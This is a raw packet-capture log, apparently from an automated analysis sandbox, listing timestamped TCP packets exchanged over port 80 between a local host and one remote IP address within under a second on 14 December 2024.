                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.353924990 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.353971004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.353971004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.443897009 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.444005966 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.444191933 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.444231987 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.445837975 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.445879936 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.445940971 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.446391106 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.449687004 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.449747086 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.449809074 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.449884892 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.453533888 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.453658104 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.453696966 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.453778028 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.457398891 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.457473040 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.457529068 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.457660913 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.461138964 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.461189985 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.461246967 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.461340904 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.464723110 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.464833021 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.464950085 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.468298912 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.468406916 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.468409061 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.468451977 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.471944094 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.472012997 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.472033024 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.472075939 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.475497007 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.475594044 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.475620031 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.475758076 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.479012966 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.479105949 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.479113102 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.479252100 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.482518911 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.482573032 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.482601881 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.483335018 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.486032963 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.486148119 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.486160994 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.487262011 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.489569902 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.489645004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.489655972 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.489855051 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.493144035 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.493232965 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.493237972 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.493366003 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.496563911 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.496689081 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.496699095 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.496783018 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.500055075 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.500112057 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.500152111 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.500152111 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.503555059 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.503668070 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.503709078 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.503709078 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.507010937 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.507088900 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.507128000 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.507128000 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.510520935 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.510628939 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.510672092 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.510672092 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.514015913 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.514117956 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.514159918 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.514159918 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.517524958 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.517570019 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.517612934 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.518085957 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.521034956 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.521145105 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.521193981 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.521194935 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.524554014 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.524611950 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.524648905 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.524715900 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.528069973 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.528225899 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.528244019 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.528465033 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.531572104 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.531692982 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.531716108 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.531876087 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.535080910 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.535202980 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.535245895 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.535245895 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.538582087 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.538670063 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.538707972 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.538707972 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.542052031 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.542115927 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.542156935 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.542232037 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.545553923 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.545641899 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.545664072 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.545715094 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.549061060 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.549140930 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.549165964 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.549534082 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.552580118 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.552665949 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.552684069 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.552793980 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.556112051 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.556221008 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.556236029 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.556385040 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.559604883 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.559673071 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.559693098 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.559725046 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.563182116 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.563301086 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.563333035 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.563543081 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.642021894 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.642102957 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.642163038 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.642258883 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.643282890 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.643383980 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.643393993 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.643459082 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.645817995 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.645873070 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.645911932 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.645992994 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.648334026 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.648394108 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.648433924 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.648533106 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.650893927 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.650949955 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.650989056 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.651026964 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.653402090 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.653634071 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.653677940 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.653738976 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.655843019 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.655899048 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.655934095 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.656058073 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.658256054 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.658353090 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.658354998 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.658525944 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.660676956 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.660748959 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.660765886 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.660916090 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.662987947 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.663049936 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.663121939 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.663165092 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.665371895 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.665472031 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.665474892 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.665554047 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.667690039 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.667778015 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.667817116 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.667818069 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.670001984 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.670068026 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.670084000 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.670146942 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.672276974 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.672382116 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.672411919 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.672435999 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.674588919 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.674638033 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.674668074 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.674743891 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.676934004 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.676947117 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.676975012 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.677006960 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.679209948 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.679246902 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.679290056 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.679290056 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.681504011 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.681546926 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.681618929 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.681703091 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.683882952 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.683973074 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.683990955 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.684102058 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.686151981 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.686244011 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.686248064 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.686357021 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.688458920 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.688539982 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.688559055 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.688579082 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.690531015 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.690587044 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.690627098 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.690668106 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.692646027 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.692692041 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.692727089 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.692864895 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.694713116 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.694771051 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.694818020 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.695034027 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.696822882 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.696927071 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.696971893 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.696971893 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.698892117 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.698956966 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.698997974 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.699040890 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.701020002 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.701096058 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.701181889 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.701251984 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.703099966 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.703233957 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.703273058 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.703274012 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.705169916 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.705255032 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.705261946 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.705301046 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.707269907 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.707330942 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.707376003 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.708059072 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.709363937 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.709461927 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.709467888 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.709788084 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.711424112 CET8049731176.113.115.19192.168.2.4
